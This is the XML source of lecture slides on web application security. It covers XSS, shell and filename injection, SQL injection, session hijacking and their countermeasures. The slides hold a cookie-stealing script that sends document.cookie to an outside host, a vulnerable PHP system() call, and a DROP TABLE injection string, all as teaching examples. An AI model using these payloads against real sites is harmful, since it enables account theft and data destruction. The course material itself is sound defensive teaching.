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5"/>
    <p:restoredTop sz="92284"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102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AA0CF-2B6C-954C-BE09-04A97C781CD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7066B-5ADD-5D45-AB71-7D518791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forged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be replayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> not timeout</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exposed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7066B-5ADD-5D45-AB71-7D5187910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forged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be replayed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> not timeout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7066B-5ADD-5D45-AB71-7D5187910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0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5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8611-6E4E-6A44-9298-EB48FEC4592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D367-EBC6-904F-BA51-7380C44B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echow.com/bricks/docs/login-1.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikibooks.org/wiki/Web_Application_Security_Gu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capsula.com/web-application-security/reflected-xss-attacks.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Cross_site_scripting" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005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Testing_for_cookies_attributes_(OTG-SESS-002)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Exploits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0483" y="5714999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Derived from slides by Prof. William </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Enck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, NCSU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20840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Scripting language used to improve quality/experience of web browsing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create dialogs, forms, graphs, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Built upon API functions (lots of different flavors) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No ability to read local files or open connections </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security: No ability to read local files, open connections, but ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – the “infinite popup” script </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often could not “break out” with restarting computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoofing – easy to create “password” dialogs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9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Content: CGI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Gateway Interface (CGI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generic way to call external applications on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passes URL to external program (e.g., form)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Result is captured and returned to requestor </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Historically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“shell” scripts used to generate content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very, very dangerous</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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42" y="4871611"/>
            <a:ext cx="8938752" cy="19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#!/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/bin/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 "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Content-type:text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/html\r\n\r\n";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 '&lt;html&gt;';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 '&lt;head&gt;';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 '&lt;title&gt;Hello World - First CGI Program&lt;/title&gt;'; print '&lt;/head&gt;';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 '&lt;body&gt;';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 '&lt;h2&gt;Hello World! This is my first CGI program&lt;/h2&gt;'; print '&lt;/body&gt;';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 '&lt;/html&gt;';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3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 placed directly in content, run on server upon request, and output returned in content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MS active server pages (ASP) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mod_perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server-side JavaScript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&lt;html&gt; &lt;head&gt;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&lt;title&gt;Hello.&lt;/title&gt; &lt;/head&gt;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&lt;body&gt;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It is now &lt;?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php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echo date(DATE_RFC822); ?&gt;.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&lt;/body&gt; &lt;/html&gt;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2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systems evolve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has evolved from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>document retrieval </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and rendering to sophisticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>distributed application platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>providing: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user-driven content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>interactive interfaces </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>multi-site content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.... </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With new interfaces comes new vulnerabilities ...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web-page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Rendered elements from many sources containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and stylized by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>cascading style sheets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(CSS) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A browser may be compromised by any of these elements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0297" y="1231209"/>
            <a:ext cx="4616245" cy="54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web systems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Cross-Site Scripting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 following is posted to a message board on your favorite website: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone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Hello message board. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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&lt;SCRIPT&gt;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malicious code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&lt;/SCRIPT&gt;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This is the end of my message.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Now the message board web app uses the input to create the dynamic webpage (e.g., blogger nonsense). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A malicious script is now running </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applet, JavaScript...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8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littered with XSS vulnerabilities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658" y="1825625"/>
            <a:ext cx="80886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DDoS Lab lessons learned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Midterm review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web App Exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Filtering presentation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Project checkpoint presentations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; VPNs) – or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>short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Stealing Cookies with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&lt;script&gt;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document.location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='http://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www.cgisecurity.com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cgi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-bin/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cookie.cgi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? '%20+document.cookie&lt;/script&gt;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3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main XSS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Persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): &lt;script&gt; tag is stored somewhere on the web server, e.g., the DB containing forum or comments. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Non-persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): &lt;script&gt; tag not stored on web server, but rather in a URL that the user clicks, e.g., in a phishing email, on forum of some other site. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User clicks on a link that refers to a page that displays part of the URL (e.g., a GET parameter). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the page doesn’t escape input, the script is executed.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4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attacks: Shell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attacker that can inject arbitrary inputs into the system can control it in subtle ways </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>shell injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- run arbitrary code by carefully selecting input such that it is run by a shell on the server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: consider &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system("ls " . $_GET['USER_INPUT']); ?&gt; where user is supposed to select a directory from a drop-down list </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>UNIXes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Linuxes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, semicolon allows multiple commands on single line; e.g., echo hello; echo goodbye </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>what happens when user sets USER_INPUT field to “/; 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/”? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Q: How can we prevent shell injection attacks?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0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attacks: filename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filename injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- if you can control what a filename is in application, then you can manipulate the host </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Poorly constructed applications build filename based on user input or input URLs, e.g., hidden POST fields </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., change temporary filename input to ~/.profile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63" y="3830213"/>
            <a:ext cx="10360537" cy="30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attacks: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Exploits the fact that many inputs to web applications are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>under control of the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used directly in SQL queries against back-end databases </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker inserts escaped code into the input: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/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SELECT email, login,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last_name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FROM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user_table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WHERE email = 'x'; DROP TABLE members; --';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the most widely exploited and costly exploits in web history. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Industry reported as many as 16% of websites were vulnerable to SQL injection in 2007 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This may be inflated, but clearly an ongoing problem.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41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Bobby Tables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7028"/>
            <a:ext cx="10515600" cy="39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9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the SQL/Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>libraries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>prepared statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, aka parameterized SQL) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/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sql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"select * from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some_table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where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some_col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$input"; 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dbh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-&gt;prepare( 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sql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); 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-&gt;execute; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/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sql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"select * from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some_table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where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some_col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?"; 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dbh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-&gt;prepare( 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sql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-&gt;execute( $input ); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Other approaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: have built (static analysis) tools for finding unsafe input code and (dynamic tools) to track the use of inputs within the web application lifetime.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76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hijacking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sessions are implemented in many ways </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session ID in cookies, URLs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If I can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>guess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>infer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the session ID, game over </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example, if your bank encodes the session ID in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then a malicious attacker can simply keep trying session IDs until gets a good one. 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www.mybank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loggedin?sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If user was logged in, attacker has full control over account. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Countermeasure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: randomized, large, confidential session IDs that are tied to individual host address (see cookies)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2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application developer is not always to blame </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Web server may be running vulnerable versions of software, e.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellshock: vulnerability in BASH allows commands to be executed when evaluating environment variables </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many servers and embedded systems use BASH for simple CGI </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: patch systems! (not always possible)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Web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 Approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate input (also called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>input sanitization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Limit program functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t leave open ended-functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute with limited privileges </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t run web server as root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apply policy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>least privilege </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tracking, e.g., taint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code analysis, e.g., c-cured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7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Web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Early web systems provided a click-render- click cycle of acquiring web content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web content consisted of static content with little user interaction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217" y="1286274"/>
            <a:ext cx="4599709" cy="54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02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https://en.wikibooks.org/wiki/Web_Application_Security_Guide</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://sechow.com/bricks/docs/login-1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Testing_for_Cross_site_scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.incapsula.com/web-application-security/reflected-xss-attacks.html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0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state with cookies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Cookies were designed to offload server state to browsers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not initially part of web tools (Netscape) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows users to have cohesive experience </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., flow from page to page </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Someone made a design choice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use cookies to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>authenticate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>authorize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>users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Amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shopping cart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208332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behaving badly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design choice means cookies must be protected </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Against forgery (integrity) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Against disclosure (confidentiality) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies not robust against web designer mistakes, committed attackers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Were never intended to be </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need the same scrutiny as any other technology </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Many security problems arise out of a technology built for one thing incorrectly applied to something else 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7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behaving badly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055" y="1295221"/>
